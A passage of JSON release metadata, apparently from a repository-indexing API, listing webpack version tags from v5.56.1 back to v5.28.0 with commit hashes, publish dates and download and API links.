ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webp